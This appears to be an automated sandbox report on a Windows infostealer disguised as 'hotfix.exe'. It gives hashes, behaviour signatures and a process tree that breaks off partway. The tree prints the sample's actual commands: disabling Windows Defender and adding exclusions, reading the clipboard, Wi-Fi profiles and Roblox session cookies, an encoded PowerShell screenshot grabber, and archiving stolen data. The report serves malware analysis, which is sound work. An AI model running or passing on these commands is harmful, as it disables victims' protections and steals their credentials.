Analysis

  • max time kernel
    101s
  • max time network
    103s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04-01-2025 13:38

General

  • Target

    hotfix.exe

  • Size

    7.4MB

  • MD5

    a2271e54b0c19f1efdba770dccee0128

  • SHA1

    6b3ff7d411df91cfc0f4a356eae6c1f407b2b8dd

  • SHA256

    f5627b2e36bff1bf291a4bee7481dbf96b9f43c709e7d95ad42c58af36860b6e

  • SHA512

    04840f8cabbadd75ebea0ae0e948551985f335c552cfdc78c8c81e8ecab690df76641414e53b4c05702e067cbf21985fddc04b4e63ec858c887bc8ccd52891ff

  • SSDEEP

    196608:MITurErvI9pWjgyvoaYrE41JIuIwoOdhe:hTurEUWjdo/H1JzoChe

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\hotfix.exe
    "C:\Users\Admin\AppData\Local\Temp\hotfix.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2400
    • C:\Users\Admin\AppData\Local\Temp\hotfix.exe
      "C:\Users\Admin\AppData\Local\Temp\hotfix.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1552
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hotfix.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hotfix.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5068
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4116
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Open your game first', 0, 'error', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4868
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Open your game first', 0, 'error', 48+16);close()"
          4⤵
            PID:3788
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2380
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2452
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3416
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4700
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3756
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4660
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3612
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:2648
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3020
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:4572
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1052
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:660
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4808
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1860
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5024
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4856
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3232
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:912
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1488
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:3176
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                • Suspicious use of WriteProcessMemory
                PID:4704
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:352
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:1836
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:3372
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:4892
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4860
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:2448
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:4328
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:3536
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:1748
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:1028
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:3756
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:1976
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3164
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmq2prjm\xmq2prjm.cmdline"
                                  5⤵
                                    PID:3348
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DFA.tmp" "c:\Users\Admin\AppData\Local\Temp\xmq2prjm\CSC9E963BABB7144FC099B267F3C3883582.TMP"
                                      6⤵
                                        PID:4936
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:2088
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:796
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:3604
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:4504
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:4496
                                          • C:\Windows\system32\attrib.exe
                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:492
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:4748
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:3940
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              3⤵
                                                PID:2036
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  4⤵
                                                  • Enumerates processes with tasklist
                                                  PID:3480
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:2652
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:2880
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:1000
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:4696
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:1548
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:4720
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:4504
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:792
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:2140
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4704
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                3⤵
                                                                  PID:2832
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    4⤵
                                                                      PID:1596
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24002\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\PxJ6X.zip" *"
                                                                    3⤵
                                                                      PID:4700
                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24002\rar.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI24002\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\PxJ6X.zip" *
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:916
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                      3⤵
                                                                        PID:4336
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic os get Caption
                                                                          4⤵
                                                                            PID:4360
                                                                        • C:\Windows\system32\cmd.exe
